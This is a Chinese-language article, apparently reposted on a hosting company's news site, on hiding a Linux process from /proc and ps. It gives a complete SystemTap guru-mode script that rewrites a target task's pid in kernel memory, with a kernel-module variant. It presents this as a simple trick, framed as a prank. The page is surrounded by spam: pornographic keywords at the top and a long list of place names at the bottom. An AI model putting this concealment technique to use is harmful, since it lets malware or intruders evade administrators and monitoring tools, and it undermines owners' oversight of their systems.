91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么隱藏Linux進程

發布時間:2021-10-25 16:23:46 來源:億速云 閱讀:403 作者:小新 欄目:系統運維

小編給大家分享一下怎么隱藏Linux進程,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

總有朋友問隱藏Linux進程的方法,我說你想隱藏到什么程度,是大隱于內核,還是小隱于用戶。網上通篇論述的無外乎 hook 掉 procfs  或者類似的用戶態方案,也都難免長篇大論,我說,這些場面都太大了,太復雜了。對于希望馬上看到效果的而言,看到這么一堆復雜的東西,大概率望而卻步。

將Linux進程小隱于用戶的非常規方法,僅僅一行代碼:

修改掉進程的pid即可。

注意是小隱,所以,不值得反制,逗一下高級會議工程師搞個惡作劇玩玩得了。

target->pid = 0x7fffffff;

完整的腳本如下:

#!/usr/bin/stap -g # hide.stp  global pid;  function hide(who:long) %{     struct task_struct *target;      target = pid_task(find_vpid(STAP_ARG_who), PIDTYPE_PID);     target->pid = 0x7fffffff; %}  probe begin {     pid = $1     hide(pid);     exit(); } ff;

來來來,試一下:

[root@localhost system]# ./tohide & [1] 403 [root@localhost system]# ./hide.stp [root@localhost system]#

用下面的命令可以檢測所有可顯示進程的二進制文件:

for pid in $(ls /proc|awk '/^[0-9]+/{print $1}'); do      ls -l /proc/$pid/exe;  done

procfs里沒了,ps當然就檢測不到了。

如果你覺得guru 模式的 stap 怪怪的,那么你完全可以編寫自己獨立的 Linux kernel module,采用修改完即退的方法:

target->pid = xxxx;

return -1;是不是比各種hook法簡單多了,所謂的動數據而不要動代碼!是不是比各種 hook 法簡單多了,所謂的動數據而不要動代碼!

簡單的說一下原理:

task被創建的時候,根據其pid注冊procfs目錄結構。

展示procfs目錄結構的時候,遍歷task list以其pid作為key來查找procfs目錄結構。

0x7fffffff(或者任何其它合理的值)根本沒有注冊過,當然無法顯示。

以上是“怎么隱藏Linux進程”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

兰州市| 德令哈市| 伊金霍洛旗| 都匀市| 湾仔区| 渭源县| 孟村| 青铜峡市| 类乌齐县| 铜鼓县| 霞浦县| 朝阳县| 林州市| 安庆市| 个旧市| 南汇区| 宜君县| 舟山市| 永川市| 叶城县| 开鲁县| 万载县| 团风县| 葵青区| 灵台县| 东乌| 巫山县| 温泉县| 房山区| 宣武区| 凤庆县| 蕉岭县| 镇江市| 平湖市| 元朗区| 西充县| 诸城市| 元谋县| 绥滨县| 玉溪市| 启东市|